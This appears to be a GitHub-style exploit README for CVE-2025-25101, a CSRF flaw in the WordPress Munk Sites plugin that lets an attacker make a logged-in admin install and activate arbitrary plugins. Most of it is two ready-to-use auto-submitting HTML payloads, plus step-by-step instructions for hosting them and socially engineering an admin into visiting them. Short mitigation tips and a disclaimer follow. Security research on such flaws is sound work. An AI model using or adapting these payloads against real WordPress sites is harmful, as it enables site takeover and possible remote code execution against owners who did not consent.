# 🚀 CVE-2025-25101 - WordPress Munk Sites Plugin <= 1.0.7 - CSRF to Arbitrary Plugin Installation

## 📌 Overview
**CVE-2025-25101** is a **Cross-Site Request Forgery (CSRF)** vulnerability in the **MetricThemes Munk Sites** plugin for WordPress (versions ≤ **1.0.7**).  
This vulnerability allows an **unauthenticated attacker** to **trick an admin into installing and activating arbitrary plugins**, potentially leading to **Remote Code Execution (RCE)** or **website compromise**.

## 🛑 Affected Versions
- **Munk Sites Plugin** `<= 1.0.7`
- **WordPress** `Any version where the plugin is active`

---
## 🛡️ Security Rating (CVSS Score)

| Score  | Severity  | Version | Vector String |
|--------|----------|---------|--------------|
| **9.6**  | 🔥 **CRITICAL** | 3.1     | `CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H` |


## 🔥 Exploit Description
### 🛠️ How the Vulnerability Works:
The **CSRF flaw** in the **Munk Sites** plugin allows an attacker to force a logged-in **WordPress admin** to install and activate any WordPress plugin **without their consent**.  
This is done by exploiting an **unprotected `admin-ajax.php` request** that lacks CSRF token verification.

### 📌 Exploit Workflow:
1. **The attacker crafts a malicious webpage containing the CSRF payload**.
2. **The victim (WordPress admin) visits the attacker's webpage**.
3. **The exploit silently sends requests to WordPress to install and activate an arbitrary plugin**.
4. **The plugin is installed and activated without any admin interaction**.

---

## 💻 Exploit Code
### **1️⃣ CSRF Exploit - Install Plugin**
**This payload forces the victim to install the `hello-world` plugin.**
```html
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>CSRF Exploit - Plugin Installation</title>
    <style>
        body { font-family: Arial, sans-serif; text-align: center; background: #f4f4f4; padding: 20px; }
        h1 { color: #d9534f; } h2 { color: #5bc0de; }
        .output { margin-top: 20px; padding: 10px; background: white; box-shadow: 0 0 10px rgba(0, 0, 0, 0.1); }
        .success { color: #5cb85c; font-weight: bold; }
    </style>
</head>
<body onload="document.forms[0].submit()">
    <h1>📌 CVE-2025-25101</h1>
    <h2>CSRF Exploit - Install 'Hello World' Plugin</h2>
    <h3>🚀 Exploit by: <b>Nxploit | Khaled Alenazi</b></h3>
    <div class="output" id="output">🔄 Installing plugin...</div>
    <form action="http://target.com/wp-admin/admin-ajax.php" method="GET">
        <input type="hidden" name="action" value="cs_install_plugin">
        <input type="hidden" name="plugin" value="hello-world">
    </form>
    <script>setTimeout(() => { document.getElementById("output").innerHTML = "<span class='success'>✅ Plugin installed successfully!</span>"; }, 5000);</script>
</body>
</html>
```

---

### **2️⃣ CSRF Exploit - Activate Plugin**
**This payload forces the victim to activate the `hello-world` plugin.**
```html
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>CSRF Exploit - Plugin Activation</title>
    <style>
        body { font-family: Arial, sans-serif; text-align: center; background: #f4f4f4; padding: 20px; }
        h1 { color: #d9534f; } h2 { color: #f0ad4e; }
        .output { margin-top: 20px; padding: 10px; background: white; box-shadow: 0 0 10px rgba(0, 0, 0, 0.1); }
        .success { color: #5cb85c; font-weight: bold; }
    </style>
</head>
<body onload="document.forms[0].submit()">
    <h1>📌 CVE-2025-25101</h1>
    <h2>CSRF Exploit - Activate 'Hello World' Plugin</h2>
    <h3>🚀 Exploit by: <b>Nxploit | Khaled Alenazi</b></h3>
    <div class="output" id="output">🔄 Activating plugin...</div>
    <form action="http://target.com/wp-admin/admin-ajax.php" method="GET">
        <input type="hidden" name="action" value="cs_active_plugin">
        <input type="hidden" name="plugin" value="hello-world">
    </form>
    <script>setTimeout(() => { document.getElementById("output").innerHTML = "<span class='success'>✅ Plugin activated successfully!</span>"; }, 5000);</script>
</body>
</html>
```

---

## 🔥 How to Use
1. **Host the malicious HTML files (`install.html` and `activate.html`) on an attacker-controlled server.**
2. **Social engineer a WordPress admin to visit `install.html`.**
3. **Once the plugin is installed, trick them into visiting `activate.html`.**
4. **The `hello-world` plugin will be installed and activated without admin consent!**

---

## 🚧 Mitigation
### 🔒 How to Protect Your WordPress Site:
- **Upgrade to the latest version of the Munk Sites plugin** (if a patch is available).
- **Use a WordPress security plugin like Wordfence or Sucuri** to block CSRF attempts.
- **Restrict access to `admin-ajax.php`** using security rules in `.htaccess` or Nginx config.
- **Ensure that only authenticated and authorized users can install or activate plugins.**
- **Implement CSRF protection using `wp_nonce_field()` and `check_admin_referer()`.**

---




## 📜 Disclaimer
⚠️ **This exploit is for educational and security research purposes only.**  
⚠️ **Unauthorized use against systems without explicit permission is illegal.**  
⚠️ **The author is not responsible for any misuse of this code.**  

---

## ⭐ Support & Contributions
If you find this research valuable, feel free to ⭐ **star the repository** and contribute by reporting **new vulnerabilities**.

**_By: Nxploit | Khaled Alenazi_**

